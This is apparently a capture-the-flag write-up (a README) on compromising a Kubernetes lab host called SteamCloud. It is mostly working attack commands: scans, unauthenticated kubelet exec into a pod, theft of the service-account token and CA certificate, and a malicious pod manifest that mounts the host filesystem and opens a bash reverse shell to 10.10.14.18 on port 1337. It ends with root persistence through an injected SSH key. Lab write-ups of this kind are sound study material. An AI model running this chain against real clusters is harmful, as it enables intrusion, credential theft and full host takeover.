Skip to content

Latest commit

 

History

History
171 lines (109 loc) · 4.26 KB

README.md

File metadata and controls

171 lines (109 loc) · 4.26 KB
Raw

SteamCloud

nmap -p- --min-rate 10000 10.10.11.133 -Pn

alt text

After detection of open ports, let's do greater nmap scan here for these ports.

nmap -A -sC -sV -p22,2379,2380,8443,10249,10250,10256 10.10.11.133 -Pn

alt text

That's K8S , we need to pentest ports (8443,10250) more specifically.

For this, I will use this blog.

Let's start from port 8443.

I try to make anonymous enumeration, but it doesn't work.

kubectl --server https://10.10.11.133:8443  get pod
kubectl --server https://10.10.11.133:8443  get namespaces
kubectl --server https://10.10.11.133:8443  get cluster-info

alt text

Let's switch into port 10250 which is Kubelet API. For this I use kubeletctl command.

kubeletctl pods -s 10.10.11.133

alt text

Let's see running pods.

kubeletctl runningpods -s 10.10.11.133 | jq -c '.items[].metadata | [.name, .namespace]'

alt text

Let's try to inject some system commands to nginx pod via kubeletctl command.

kubeletctl -s 10.10.11.133 exec "id" -p nginx -c nginx

alt text

While I try to do reverse shell, but it doesn't work.

That's why I try to submit just /bin/bash to get shell.

kubeletctl -s 10.10.11.133 exec "/bin/bash" -p nginx -c nginx

user.txt

alt text

From this information, I need to check these files that I can read or not.

kubeletctl -s 10.10.11.133 exec "ls /run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx

alt text

I have three of them being ca.crt, namespace and token.

ca.crt: It's the ca certificate to check kubernetes communications namespace: It indicates the current namespace token: It contains the service token of the current pod.

Let's get token and ca.crt files as below.

kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee ca.crt
kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee token

alt text

Let's add this token into environment variables on our machine via export command which we will use to authenticate into k8s by using certificate also.

export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)

alt text

Now, it's time to check we have authentication is valid into k8s or not via kubectl command.

kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get pod

alt text

Let's create malicious pod via below .yaml file.

apiVersion: v1
kind: Pod
metadata:
  name: dr4ks-malpod
  namespace: default
spec:
  containers:
  - name: dr4ks-malpod
    image: nginx:1.14.2
    command: ["/bin/bash"]
    args: ["-c", "/bin/bash -i >& /dev/tcp/10.10.14.18/1337 0>&1"]
    volumeMounts:
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

While I create a pod via above .yaml config file, I will get reverse shell from port 1337. For creation of pod, I will use kubectl apply command.

kubectl apply -f dr4ks_malpod.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

alt text

Hola, I got reverse shell from port 1337.

alt text

root.txt

alt text

To get persistent shell, I need to add my public key into /mnt/root/.ssh/authorized_keys file as below.

echo "{public_key}" > /mnt/root/.ssh/authorized_keys

alt text

Then, I can join to host via private key id_rsa file.

ssh -i /root/.ssh/id_rsa root@10.10.11.133

alt text